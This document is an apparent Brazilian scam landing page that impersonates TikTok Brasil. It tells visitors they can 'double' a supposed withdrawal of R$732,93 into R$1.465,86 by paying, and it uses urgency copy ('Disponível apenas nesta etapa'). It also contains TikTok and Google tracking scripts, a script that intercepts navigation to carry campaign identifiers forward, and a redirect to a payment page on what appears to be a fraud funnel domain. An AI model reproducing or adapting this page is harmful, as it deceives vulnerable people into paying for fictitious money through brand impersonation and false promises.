<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Conversao Dupla</title>
    <!-- TikTok Pixel Code Start -->
    <script>
        !(function (w, d, t) {
          w.TiktokAnalyticsObject = t;
          var ttq = (w[t] = w[t] || []);
          (ttq.methods = [
            "page",
            "track",
            "identify",
            "instances",
            "debug",
            "on",
            "off",
            "once",
            "ready",
            "alias",
            "group",
            "enableCookie",
            "disableCookie",
            "holdConsent",
            "revokeConsent",
            "grantConsent",
          ]),
            (ttq.setAndDefer = function (t, e) {
              t[e] = function () {
                t.push([e].concat(Array.prototype.slice.call(arguments, 0)));
              };
            });
          for (var i = 0; i < ttq.methods.length; i++)
            ttq.setAndDefer(ttq, ttq.methods[i]);
          (ttq.instance = function (t) {
            for (var e = ttq._i[t] || [], n = 0; n < ttq.methods.length; n++)
              ttq.setAndDefer(e, ttq.methods[n]);
            return e;
          }),
            (ttq.load = function (e, n) {
              var r = "https://analytics.tiktok.com/i18n/pixel/events.js",
                o = n && n.partner;
              (ttq._i = ttq._i || {}),
                (ttq._i[e] = []),
                (ttq._i[e]._u = r),
                (ttq._t = ttq._t || {}),
                (ttq._t[e] = +new Date()),
                (ttq._o = ttq._o || {}),
                (ttq._o[e] = n || {});
              n = document.createElement("script");
              (n.type = "text/javascript"),
                (n.async = !0),
                (n.src = r + "?sdkid=" + e + "&lib=" + t);
              e = document.getElementsByTagName("script")[0];
              e.parentNode.insertBefore(n, e);
            });
  
          ttq.load("D4L781BC77U4IAHDOBPG");
          ttq.page();
        })(window, document, "ttq");
      </script>
      <!-- TikTok Pixel Code End -->
      <!-- Script para preservar UTMs e salvar no localStorage -->
      <script>
        (function() {
          'use strict';
          console.log('🔗 [UP1] Script de preservação de UTM params carregado...');
          
          // Função para extrair e salvar UTMs da URL
          function saveUtmParamsFromUrl() {
            try {
              const urlParams = new URLSearchParams(window.location.search);
              const utmParams = {};
              
              const utmFields = [
                "utm_source", "utm_medium", "utm_campaign", "utm_term", "utm_content",
                "click_id", "fbclid", "gclid", "msclkid", "ttclid"
              ];
              
              // Extrai UTMs da URL
              utmFields.forEach((param) => {
                if (urlParams.has(param)) {
                  utmParams[param] = urlParams.get(param);
                }
              });
              
              // Se encontrou UTMs na URL, salva no localStorage
              if (Object.keys(utmParams).length > 0) {
                localStorage.setItem("utm_params", JSON.stringify(utmParams));
                console.log("✅ [UP1] UTM params salvos no localStorage:", utmParams);
              } else {
                // Se não encontrou na URL, tenta recuperar do localStorage
                const storedUtm = localStorage.getItem("utm_params");
                if (storedUtm) {
                  console.log("✅ [UP1] UTM params recuperados do localStorage:", JSON.parse(storedUtm));
                }
              }
            } catch (e) {
              console.warn("⚠️ [UP1] Erro ao processar UTMs:", e);
            }
          }
          
          // Executa imediatamente
          saveUtmParamsFromUrl();
          
          // Também intercepta location.href para preservar UTMs
          try {
            const originalLocation = window.location;
            const locationDescriptor = Object.getOwnPropertyDescriptor(window, 'location') || 
                                       Object.getOwnPropertyDescriptor(Object.getPrototypeOf(window), 'location');
            
            if (locationDescriptor && locationDescriptor.set) {
              const originalHrefSetter = locationDescriptor.set;
              Object.defineProperty(window, 'location', {
                set: function(url) {
                  try {
                    const storedUtm = localStorage.getItem("utm_params");
                    if (storedUtm) {
                      const utmData = JSON.parse(storedUtm);
                      const urlObj = new URL(url, window.location.origin);
                      Object.keys(utmData).forEach((key) => {
                        if (!urlObj.searchParams.has(key) && utmData[key]) {
                          urlObj.searchParams.set(key, utmData[key]);
                        }
                      });
                      url = urlObj.toString();
                      console.log('🔄 [UP1] UTMs adicionados à URL:', url);
                    }
                  } catch (e) {
                    console.warn('⚠️ [UP1] Erro ao adicionar UTMs:', e);
                  }
                  return originalHrefSetter.call(window, url);
                },
                get: locationDescriptor.get,
                configurable: true,
                enumerable: true
              });
            }
          } catch (e) {
            console.warn('⚠️ [UP1] Erro ao interceptar location:', e);
          }
        })();
      </script>
    <!-- TikTok Pixel Code End -->
    <script src="https://bonusnovottk.online/checkout/preserve-utm-params.js"></script>
    <!-- API centralizada de pagamento (compartilhada do checkout principal) -->
    <script src="js/payment-api.js"></script>
    <!-- TikTok PIX Tracker - Dispara InitiateCheckout quando PIX é criado (compartilhado) -->
    <script src="js/tiktok-pix-tracker.js"></script>
    <!-- Wrapper para InitiateCheckout (compartilhado) -->
    <script src="js/tiktok-init.js"></script>
    <script src="js/utm-handler.js" data-token="634f51e3-ed49-43e9-9e73-94d196bba475" data-click-id-param="click_id">
</script>
    <style>
        :root {
                     --kwai-orange: #FE2C55;
            --kwai-dark: #181212ff;
            --kwai-light: #FFF5EF;
            --kwai-yellow: #FFD600;
            --kwai-red: #FF3D00;
        }
        
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
        }
        
        body {
            background-color: var(--kwai-light);
            color: var(--kwai-dark);
            line-height: 1.6;
        }
        
        .container {
            max-width: 100%;
            width: 100%;
            padding: 15px;
            margin: 0 auto;
        }
        
        .kwai-header {
            background: linear-gradient(135deg, var(--kwai-orange), #FE2C55);
            padding: 15px 0;
            text-align: center;
            box-shadow: 0 2px 10px rgba(0,0,0,0.1);
            position: relative;
        }
        
        .kwai-logo {
            height: 40px;
            margin-bottom: 10px;
        }
        
        .offer-container {
            background: white;
            border-radius: 12px;
            padding: 20px;
            margin: 20px auto;
            box-shadow: 0 5px 15px rgba(255,107,0,0.1);
            border: 1px solid rgba(255,107,0,0.2);
            max-width: 500px;
        }
        
        .offer-title {
            color: var(--kwai-orange);
            font-size: 22px;
            font-weight: 700;
            margin-bottom: 15px;
            text-align: center;
        }
        
        .offer-icon {
            font-size: 30px;
            text-align: center;
            margin-bottom: 15px;
        }
        
        .offer-description {
            margin-bottom: 20px;
            font-size: 16px;
        }
        
        .highlight {
            background-color: rgba(255,107,0,0.1);
            padding: 10px;
            border-radius: 8px;
            margin: 15px 0;
            border-left: 3px solid var(--kwai-orange);
        }
        
        .price-tag {
            background-color: var(--kwai-orange);
            color: white;
            padding: 8px 15px;
            border-radius: 20px;
            font-weight: bold;
            display: inline-block;
            margin: 10px 0;
        }
        
        .cta-button {
            background: linear-gradient(to right, var(--kwai-orange), #FE2C55);
            color: white;
            border: none;
            padding: 15px 30px;
            font-size: 18px;
            font-weight: bold;
            border-radius: 30px;
            width: 100%;
            cursor: pointer;
            margin: 20px 0;
            box-shadow: 0 4px 10px rgba(255,107,0,0.3);
            transition: all 0.3s ease;
            text-align: center;
            display: block;
            text-decoration: none;
        }
        
        .cta-button:hover {
            transform: translateY(-2px);
            box-shadow: 0 6px 15px rgba(255,107,0,0.4);
        }
        
        .cta-button:active {
            transform: translateY(0);
        }
        
        .benefits-list {
            list-style-type: none;
            margin: 15px 0;
        }
        
        .benefits-list li {
            padding: 8px 0;
            padding-left: 30px;
            position: relative;
        }
        
        .benefits-list li:before {
            content: "✓";
            color: var(--kwai-orange);
            font-weight: bold;
            position: absolute;
            left: 0;
        }
        
        .timer {
            background-color: var(--kwai-red);
            color: white;
            padding: 10px;
            border-radius: 8px;
            text-align: center;
            font-weight: bold;
            margin: 15px 0;
            display: flex;
            justify-content: center;
            align-items: center;
        }
        
        .timer-icon {
            margin-right: 10px;
        }
        
        .footer {
            text-align: center;
            font-size: 12px;
            color: #666;
            margin-top: 30px;
            padding: 15px;
        }
        
        @media (max-width: 480px) {
            .offer-title {
                font-size: 20px;
            }
            
            .offer-description {
                font-size: 15px;
            }
            
            .cta-button {
                padding: 12px 20px;
                font-size: 16px;
            }
        }
    </style>
    
    <!-- Google tag (gtag.js) -->
<script async="" src="https://www.googletagmanager.com/gtag/js?id=G-RT8X1RNDME"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-RT8X1RNDME');
</script>
    
    
    
</head>
<body>
    <div class="kwai-header">
        <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 118 42" width="118" height="42"><path fill="#25F4EE" d="M9.875 16.842v-1.119A8.836 8.836 0 008.7 15.64c-4.797-.006-8.7 3.9-8.7 8.707a8.706 8.706 0 003.718 7.135A8.675 8.675 0 011.38 25.55c0-4.737 3.794-8.598 8.495-8.707z"></path><path fill="#25F4EE" d="M10.086 29.526c2.14 0 3.89-1.707 3.967-3.83l.006-18.968h3.463a6.78 6.78 0 01-.11-1.202h-4.726l-.006 18.969a3.978 3.978 0 01-3.967 3.829 3.93 3.93 0 01-1.846-.46 3.949 3.949 0 003.22 1.662zM23.992 13.166v-1.055a6.506 6.506 0 01-3.583-1.068 6.571 6.571 0 003.583 2.123z"></path><path fill="#FE2C55" d="M20.409 11.043a6.54 6.54 0 01-1.616-4.315h-1.265a6.557 6.557 0 002.88 4.316zM8.706 20.365a3.98 3.98 0 00-3.973 3.976c0 1.528.869 2.858 2.134 3.523a3.936 3.936 0 01-.754-2.321 3.98 3.98 0 013.973-3.976c.409 0 .805.07 1.175.185v-4.833a8.837 8.837 0 00-1.175-.083c-.07 0-.134.006-.204.006v3.708a3.999 3.999 0 00-1.176-.185z"></path><path fill="#FE2C55" d="M23.992 13.166v3.676c-2.453 0-4.727-.786-6.58-2.116v9.621c0 4.802-3.902 8.714-8.706 8.714a8.669 8.669 0 01-4.988-1.579 8.69 8.69 0 006.368 2.781c4.797 0 8.707-3.906 8.707-8.714v-9.621a11.25 11.25 0 006.579 2.116v-4.73c-.48 0-.94-.052-1.38-.148z"></path><path fill="black" d="M17.413 24.348v-9.622a11.251 11.251 0 006.58 2.116v-3.676a6.571 6.571 0 01-3.584-2.123 6.61 6.61 0 01-2.888-4.315H14.06l-.006 18.968a3.978 3.978 0 01-3.967 3.83A3.99 3.99 0 016.86 27.87a3.991 3.991 0 01-2.133-3.523A3.98 3.98 0 018.7 20.372c.409 0 .805.07 1.175.185v-3.708c-4.701.103-8.495 3.964-8.495 8.701 0 2.29.888 4.373 2.338 5.933a8.669 8.669 0 004.988 1.58c4.798 0 8.707-3.913 8.707-8.714zM30.048 13.179h14.774l-1.354 4.232h-3.832v15.644h-4.778V17.41l-4.804.006-.006-4.238zM69.032 13.179h15.12l-1.355 4.232h-4.17v15.644h-4.785V17.41l-4.804.006-.006-4.238zM45.73 19.502h4.733v13.553h-4.708l-.026-13.553zM52.347 13.128h4.733v9.257l4.689-4.61h5.646l-5.934 5.76 6.644 9.52h-5.213l-4.433-6.598-1.405 1.362v5.236H52.34V13.128h.006zM102.49 13.128h4.734v9.257l4.688-4.61h5.647l-5.934 5.76 6.643 9.52h-5.206l-4.433-6.598-1.405 1.362v5.236h-4.734V13.128zM48.093 17.954a2.384 2.384 0 002.382-2.384 2.384 2.384 0 10-2.382 2.384z"></path><path fill="#25F4EE" d="M83.544 24.942a8.112 8.112 0 017.474-8.087 8.748 8.748 0 00-.709-.026c-4.478 0-8.106 3.631-8.106 8.113 0 4.482 3.628 8.113 8.106 8.113.21 0 .498-.013.71-.026-4.178-.326-7.475-3.823-7.475-8.087z"></path><path fill="#FE2C55" d="M92.858 16.83c-.217 0-.505.012-.716.025a8.111 8.111 0 017.468 8.087 8.112 8.112 0 01-7.468 8.087c.211.02.499.026.716.026 4.478 0 8.106-3.631 8.106-8.113 0-4.482-3.628-8.113-8.106-8.113z"></path><path fill="black" d="M91.58 28.887a3.94 3.94 0 01-3.94-3.945 3.94 3.94 0 117.882 0c0 2.18-1.77 3.945-3.942 3.945zm0-12.058c-4.477 0-8.106 3.631-8.106 8.113 0 4.482 3.629 8.113 8.106 8.113 4.478 0 8.106-3.631 8.106-8.113 0-4.482-3.628-8.113-8.106-8.113z"></path></svg>
    </div>
    
    <div class="container">
<div class="offer-container">
    <div class="offer-icon">💸</div>
    <h1 class="offer-title">Conversão em Saldo Duplicado</h1>
    
    <div class="offer-description">
        <p>Você pode converter seu saque de <strong>R$732,93</strong> em saldo duplicado no novo aplicativo do sistema.</p>
        
        <div class="highlight" style="background-color: rgba(255,214,0,0.2); border-left-color: var(--kwai-yellow);">
            <p>Ao ativar a conversão, você receberá <strong>R$1.465,86</strong> como saldo interno para usar no app e liberar diretamente com prioridade.</p>
        </div>
    </div>
    
  
    <div class="highlight" style="background-color: rgba(255,61,0,0.1); border-left-color: var(--kwai-red);">
        <p>💡 <strong>Disponível apenas nesta etapa</strong></p>
    </div>
    
    <a href="/up8/checkout/index.html" class="cta-button" onclick="event.preventDefault(); redirectToPayment(); return false;">✅ DUPLICAR MEU SALDO AGORA</a>
    
    
</div>
    </div>
    
    <div class="footer">
        © 2025 TikTok Brasil - Todos os direitos reservados
    </div>
    
    <script>
      function redirectToPayment() {
        const urlParams = new URLSearchParams(window.location.search);
        const queryString = urlParams.toString();
        window.location.href = "../pagamento8" + (queryString ? "?" + queryString : "");
      }
    </script>

</body></html>